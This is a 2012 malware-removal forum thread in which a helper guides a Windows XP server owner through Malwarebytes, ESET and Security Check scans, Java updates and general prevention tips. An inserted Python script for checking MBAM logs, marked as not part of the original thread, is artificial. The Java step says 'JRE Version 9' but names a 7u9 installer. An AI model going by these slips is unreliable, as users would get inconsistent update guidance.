24-09-2012 07:22:30 System Checkpoint
25-09-2012 08:22:29 System Checkpoint
26-09-2012 09:22:30 System Checkpoint
27-09-2012 10:22:27 System Checkpoint
28-09-2012 11:22:30 System Checkpoint
29-09-2012 12:22:26 System Checkpoint
30-09-2012 13:22:12 System Checkpoint
01-10-2012 14:22:08 System Checkpoint
02-10-2012 14:35:29 System Checkpoint
03-10-2012 15:22:11 System Checkpoint
04-10-2012 16:22:10 System Checkpoint
05-10-2012 17:22:08 System Checkpoint
06-10-2012 18:22:11 System Checkpoint
07-10-2012 19:21:56 System Checkpoint
08-10-2012 20:21:58 System Checkpoint
09-10-2012 21:22:06 System Checkpoint
10-10-2012 07:00:23 Software Distribution Service 3.0
11-10-2012 07:27:09 System Checkpoint
12-10-2012 08:39:37 System Checkpoint
13-10-2012 09:27:09 System Checkpoint
13-10-2012 14:57:01 Removed LogMeIn
13-10-2012 15:01:31 Removed Box Sync
13-10-2012 15:02:47 Removed Adobe Reader 6.0.1
13-10-2012 15:03:58 Removed Google Drive
13-10-2012 16:24:40 Installed AVG 2013
13-10-2012 16:25:38 Installed AVG 2013
13-10-2012 18:20:38 Installed Windows Media Format SDK KB902344.
13-10-2012 18:22:22 Installed %1 %2.
13-10-2012 18:25:15 Installed %1 %2.
13-10-2012 18:41:15 Installed Windows XP KB2492386.
14-10-2012 19:18:46 System Checkpoint
15-10-2012 20:18:45 System Checkpoint
16-10-2012 21:18:48 System Checkpoint
17-10-2012 22:18:56 System Checkpoint
18-10-2012 23:18:52 System Checkpoint
19-10-2012 23:44:17 System Checkpoint
21-10-2012 00:18:51 System Checkpoint
22-10-2012 01:18:25 System Checkpoint
23-10-2012 02:18:25 System Checkpoint
24-10-2012 03:18:25 System Checkpoint
25-10-2012 04:18:27 System Checkpoint
26-10-2012 05:18:27 System Checkpoint
27-10-2012 06:18:30 System Checkpoint
28-10-2012 07:18:26 System Checkpoint
29-10-2012 08:18:17 System Checkpoint
30-10-2012 14:17:14 System Checkpoint
31-10-2012 19:53:57 System Checkpoint
01-11-2012 20:44:12 System Checkpoint
02-11-2012 21:11:06 System Checkpoint
03-11-2012 21:44:11 System Checkpoint
04-11-2012 23:45:27 System Checkpoint
05-11-2012 23:59:03 System Checkpoint

**** End of log ****

#4 Novicode

Posted 06 November 2012 - 07:13 PM

The computer appears to be running normally. I have been using it for server hosting ever since the incident and have had no sign of change.

#5 dev00790

Posted 07 November 2012 - 07:44 PM

Hi

The computer appears to be running normally. I have been using it for server hosting ever since the incident and have had no sign of change.


I would recommend we continue looking into the computer.
- There may be malware on there that some tools identify, which have not been run yet.
- Also I see lots of outdated software, such as Internet Explorer 6, and Java which leave your computer wide open to the possibility of being (re)infected in the future.

Let me know what you decide to do.

Regards, dev00790

---------------------------------------

Marge: "Homer, the plant called. They said if you don't show up tomorrow don't bother showing up on Monday." Homer: "Woo-hoo! Four-day weekend!"
I do not reply to Private Messages (PMs) asking for assistance - please use the forums instead. If I have been helping you, and I have not replied to your latest post in 48 hours please send me a PM.


#6 Novicode

Posted 07 November 2012 - 09:13 PM

I would like to continue looking into the computer, just in case. I don't use, nor care about IE but I will update Java when I find the time tomorrow. What should we do next?

#7 dev00790

Posted 08 November 2012 - 07:40 PM

Hi

Please do the following next:

Step 1:

Download Malwarebytes' Anti-Malware (aka MBAM): http://www.malwarebytes.org/mbam-download.php to your desktop.

  • Double-click mbam-setup.exe and follow the prompts to install the program.
  • At the end, be sure a checkmark is placed next to Update Malwarebytes' Anti-Malware and Launch Malwarebytes' Anti-Malware, then click Finish.
  • If an update is found, it will download and install the latest version.
  • Once the program has loaded, select Perform full scan, then click Scan.
  • When the scan is complete, click OK, then Show Results to view the results.
  • Be sure that everything is checked, and click Remove Selected.
  • When completed, a log will open in Notepad.
  • Post the log in your next reply.

If requested by MBAM, restart the computer.

The log can also be found here:
C:\Documents and Settings\<Username>\Application Data\Malwarebytes\Malwarebytes' Anti-Malware\Logs\log-date.txt
Or at C:\Users\<Username>\AppData\Roaming\Malwarebytes\Malwarebytes' Anti-Malware\Logs\log-date.txt


Step 2:

I'd like us to scan your machine with ESET Online Scanner:

Note: You can use either Internet Explorer or Mozilla FireFox for this scan. You will however need to disable your current installed Anti-Virus, how to do so can be read here.

Note: Vista/Windows 7 users: You will need to right-click on either the IE or FF icon in the Start Menu or Quick Launch Bar on the Taskbar and select Run as Administrator from the context menu.

  • Hold down Control and click on this link to open ESET OnlineScan in a new window.
  • Click the Posted Image button.
  • For alternate browsers only: (Microsoft Internet Explorer users can skip these steps)
    • Click on esetsmartinstaller_enu.exe to download the ESET Smart Installer. Save it to your desktop.
    • Double click on the Posted Image icon on your desktop.
  • Check "YES, I accept the Terms of Use."
  • Click the Start button.
  • Accept any security warnings from your browser.
  • Under scan settings, check "Scan Archives" and "Remove found threats"
  • Click Advanced settings and select the following:
    • Scan potentially unwanted applications
    • Scan for potentially unsafe applications
    • Enable Anti-Stealth technology
  • ESET will then download updates for itself, install itself, and begin scanning your computer. Please be patient as this can take some time.
  • When the scan completes, click List Threats
  • Click Export, and save the file to your desktop using a unique name, such as ESETScan. Include the contents of this report in your next reply.
  • On ESET: Click the Back button, then the Finish button.
Note: Do not forget to re-enable your Anti-Virus application after running the above scan!


Step 3:

How is the computer running now?

Regards, dev00790



#8 Novicode

Posted 10 November 2012 - 08:24 AM

MBAM:

Malwarebytes Anti-Malware 1.65.1.1000
www.malwarebytes.org

Database version: v2012.11.08.11

Windows XP Service Pack 3 x86 NTFS
Internet Explorer 6.0.2900.5512
Joe :: SERVER [administrator]

11/8/2012 8:46:17 PM
mbam-log-2012-11-08 (20-46-17).txt

Scan type: Full scan (C:\|)
Scan options enabled: Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken | PUP | PUM
Scan options disabled: P2P
Objects scanned: 343482
Time elapsed: 3 hour(s), 29 minute(s), 36 second(s)

Memory Processes Detected: 0
(No malicious items detected)

Memory Modules Detected: 0
(No malicious items detected)

Registry Keys Detected: 0
(No malicious items detected)

Registry Values Detected: 0
(No malicious items detected)

Registry Data Items Detected: 0
(No malicious items detected)

Folders Detected: 0
(No malicious items detected)

Files Detected: 0
(No malicious items detected)

(end)

ESET:

There was not a "List Threats" button because there were no threats found.

I have never noticed a change in the computer since the incident, it's still running good like it should be.
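
Zero detections only mean something if the scan itself was adequate, so the header of the log above is worth checking as well as the counts. The following is an added example, not part of the original posts and not a Malwarebytes tool: it parses the MBAM 1.x log fields shown above and flags stale definitions, a scan that was not a full scan, missing scan options, or a non-administrator run. The function names and the thresholds are assumptions of this example.

```python
import re
from datetime import date

# Header and summary lines copied from the MBAM 1.65 log posted above; unused
# header lines and the "(No malicious items detected)" lines are left out.
SAMPLE_LOG = r"""Malwarebytes Anti-Malware 1.65.1.1000
Database version: v2012.11.08.11
Joe :: SERVER [administrator]
mbam-log-2012-11-08 (20-46-17).txt
Scan type: Full scan (C:\|)
Scan options enabled: Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken | PUP | PUM
Scan options disabled: P2P
Memory Processes Detected: 0
Memory Modules Detected: 0
Registry Keys Detected: 0
Registry Values Detected: 0
Registry Data Items Detected: 0
Folders Detected: 0
Files Detected: 0
"""

# Assumed acceptance criteria (chosen for this example, not from MBAM or the thread).
REQUIRED_OPTIONS = {"Memory", "Startup", "Registry", "File System"}
MAX_DB_AGE_DAYS = 3


def field(text, label):
    """Return the value of a 'Label: value' line, or None if absent."""
    m = re.search(rf"^{re.escape(label)}: (.+?)[ \t\r]*$", text, re.M)
    return m.group(1) if m else None


def triage_mbam_log(text):
    """Return (detections, warnings) for an MBAM 1.x text log."""
    detections = {m.group(1): int(m.group(2)) for m in
                  re.finditer(r"^(.+?) Detected: (\d+)[ \t\r]*$", text, re.M)}
    warnings = []
    if not detections:
        warnings.append("no detection summary found (truncated log?)")
    # Definition age at scan time; the scan date is taken from the log
    # file name because it is locale-independent (YYYY-MM-DD).
    db = re.search(r"^Database version: v(\d{4})\.(\d{2})\.(\d{2})\.", text, re.M)
    run = re.search(r"^mbam-log-(\d{4})-(\d{2})-(\d{2}) ", text, re.M)
    if db and run:
        age = (date(*map(int, run.groups())) - date(*map(int, db.groups()))).days
        if age > MAX_DB_AGE_DAYS:
            warnings.append(f"definitions {age} days old at scan time")
    else:
        warnings.append("database version or scan date missing")
    if not (field(text, "Scan type") or "").lower().startswith("full scan"):
        warnings.append("not a full scan")
    enabled = {o.strip() for o in (field(text, "Scan options enabled") or "").split("|")}
    missing = sorted(REQUIRED_OPTIONS - enabled)
    if missing:
        warnings.append("scan options not enabled: " + ", ".join(missing))
    if not re.search(r"^.+ :: .+ \[administrator\][ \t\r]*$", text, re.M):
        warnings.append("scan not run from an administrator account")
    return detections, warnings
```

Calling `triage_mbam_log(SAMPLE_LOG)` returns seven categories with zero detections and an empty warning list, because the definitions in the posted log carry the same date as the scan.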

#9 dev00790

Posted 10 November 2012 - 10:43 AM

Hi


Step 1:

Important Note: Your version of Internet Explorer is outdated. Older versions have vulnerabilities that malicious sites can use to exploit and infect your system.



Step 2:

Important Note: Your version of Java is out of date. Older versions have vulnerabilities that malicious sites can use to exploit and infect your system.


Please follow these steps to remove older version Java components and update:

  • Download the latest version of Java Runtime Environment (JRE) Version 9 and save it to your desktop.
  • Look for "Java Platform, Standard Edition".
  • Click the "Download JRE" button to the right.
  • Read the License Agreement, and then check the box that says: "Accept License Agreement".
  • From the list, select your OS and Platform (32-bit or 64-bit).
    64-bit OS users, should read: Which Java download should I choose for my 64-bit Windows operating system?
  • If a download for an Offline Installation is available, it is recommended to choose that and save the file to your desktop.
  • Close any programs you may have running - especially your web browser.

Go to Posted Image > Control Panel, double-click on Add/Remove Programs or Programs and Features in Vista/Windows 7 and remove all older versions of Java.
  • Check (highlight) any item with Java Runtime Environment (JRE or J2SE) in the name.
  • Click the Remove or Change/Remove button and follow the onscreen instructions for the Java uninstaller.
  • Repeat as many times as necessary to remove each Java version.
  • Reboot your computer once all Java components are removed.
  • Then from your desktop double-click on jre-7u9-windows-i586.exe (or jre-7u9-windows-x64.exe for 64-bit) to install the newest version.
  • If using Windows 7 or Vista and the installer refuses to launch due to insufficient user permissions, then Run As Administrator.
  • When the Java Setup - Welcome window opens, click the Install > button.
  • If offered any unwanted software or toolbars during installation, just uncheck the box before continuing unless you want it.
  • The McAfee Security Scan Plus tool is installed by default unless you uncheck the McAfee installation box when updating Java.

Note: The Java Quick Starter (JQS.exe) adds a service to improve the initial startup time of Java applets and applications but it's not necessary.
To disable the JQS service if you don't want to use it:
  • Go to Start > Control Panel > Java > Advanced > Miscellaneous and uncheck the box for Java Quick Starter.
  • Click Ok and reboot your computer.


Step 3:

Rerun Security Check by screen317 on your desktop.
  • Double click SecurityCheck.exe and follow the onscreen instructions inside of the black box.
  • A Notepad document should open automatically called checkup.txt; please post the contents of that document in your next reply.

Edited by dev00790, 10 November 2012 - 10:44 AM.

Regards, dev00790



#10 Novicode

Posted 11 November 2012 - 11:41 AM

Security Check:

Results of screen317's Security Check version 0.99.54
Windows XP Service Pack 3 x86
Internet Explorer 8
``````````````Antivirus/Firewall Check:``````````````
Windows Firewall Enabled!
AVG 2013
ESET Online Scanner v3
`````````Anti-malware/Other Utilities Check:`````````
Malwarebytes Anti-Malware version 1.65.1.1000
Java 7 Update 9
````````Process Check: objlist.exe by Laurent````````
AVG avgwdsvc.exe
AVG avgrsx.exe
AVG avgemc.exe
`````````````````System Health check`````````````````
Total Fragmentation on Drive C:: 33% Defragment your hard drive soon! (Do NOT defrag if SSD!)
````````````````````End of Log``````````````````````

Looks like I still need to defrag, but I can do that later. The PC is still running fine, just like before it was hijacked. Although it appears there isn't any malware on the machine, what else should we check? For example, could the person have tampered with settings or things like that?

Edited by Novicode, 11 November 2012 - 11:43 AM.


#11 dev00790

Posted 11 November 2012 - 06:56 PM

Your machine appears clean!

Are you having any additional problems at this point? If so, please let me know. Otherwise feel free to enjoy use of your repaired machine.

----------------

Please set your system to hide all hidden files.

  • Click Start, open My Computer, select the Tools menu and click Folder Options.
  • Select the View Tab. Under the Hidden files and folders heading,
    • Uncheck Show hidden files and folders.
    • Check: Hide file extensions for known file types.
    • Check: Hide protected operating system files (recommended) option.
  • Click Yes to confirm.

Removing all System Restore points except the last

  • Click Start, Run and type CLEANMGR and press Enter
  • Select the hard disk partition (usually C:) then press OK
  • At the top of the dialog, click the tab More Options. - If this tab is not visible then press Clean up system files, then Select the hard disk partition (usually C:), then press OK. Then click on the More options button.
  • Under System Restore section, click the button Clean up....
  • Click Delete.

----------------

The most common cause of an infected machine is the Trojan Horse, or programs which appear to be legitimate but which contain malicious payloads, or which are simply malicious in and of themselves. No antivirus, firewall, host-based intrusion prevention system (HIPS), or other security software can fully protect you against this kind of attack. The best way to protect yourself is not to run email attachments from untrusted sources, and avoid software downloaded from the internet wherever possible. Remember, when you run an application, you are giving that application permission to do to your machine anything you can do to the machine, including create, modify, or destroy files or other data. In the Windows (and most other systems, such as Unix) security model, applications don't have privileges, users do.

The second most common cause of infection is out of date software. Leaving your system unpatched leaves holes through which attackers can execute code on your behalf without your consent. This goes for far more than common targets such as Windows and Internet Explorer. Most recent threats target other third party software, such as Adobe's Adobe Reader, Shockwave Player, or Flash Player, or Oracle's Java browser plugins. You can check your system for out of date software manually, or by using automated tools such as Secunia's Personal Software Inspector. This goes doubly for security applications such as antivirus and other antimalware products based on definition lists, where out of date lists mean no detection of newer malware.

Finally, occasionally you will be forced to run some potentially infected binary, or attackers will use a hole which is unpatched by software vendors, so a last line of defense is needed. That means turning on a firewall (Windows Firewall included with Windows XP SP2 or later is fine) and leaving it on, and using and keeping up to date an antivirus solution such as Norton AntiVirus. Antiviral solutions don't even have to cost money; for instance Microsoft Security Essentials provides perfectly acceptable protection for free. If for some reason you don't like MSE, there are other free products available as well:
  • Avast (home use only)
  • Avira (shows nag screen to purchase full product when updating, home use only)
  • AVG (slightly poorer performance as of late)

That should be fine for the majority of users. However, if you absolutely want additional protection, consider one or more of the following products:
If you want more information on methods malware use to infect your computer, consider browsing our How did I get infected? topic.

Regards, dev00790



#12 Novicode

Posted 11 November 2012 - 07:04 PM

Thank you so much for your concern and quick but very detailed help. I will definitely turn to Bleeping Computer with any other issue I cannot fix myself, or simply if I need guidance with something I have not experienced before, like this. Thanks again!

#13 dev00790

Posted 11 November 2012 - 07:23 PM

You're welcome :)

Regards, dev00790
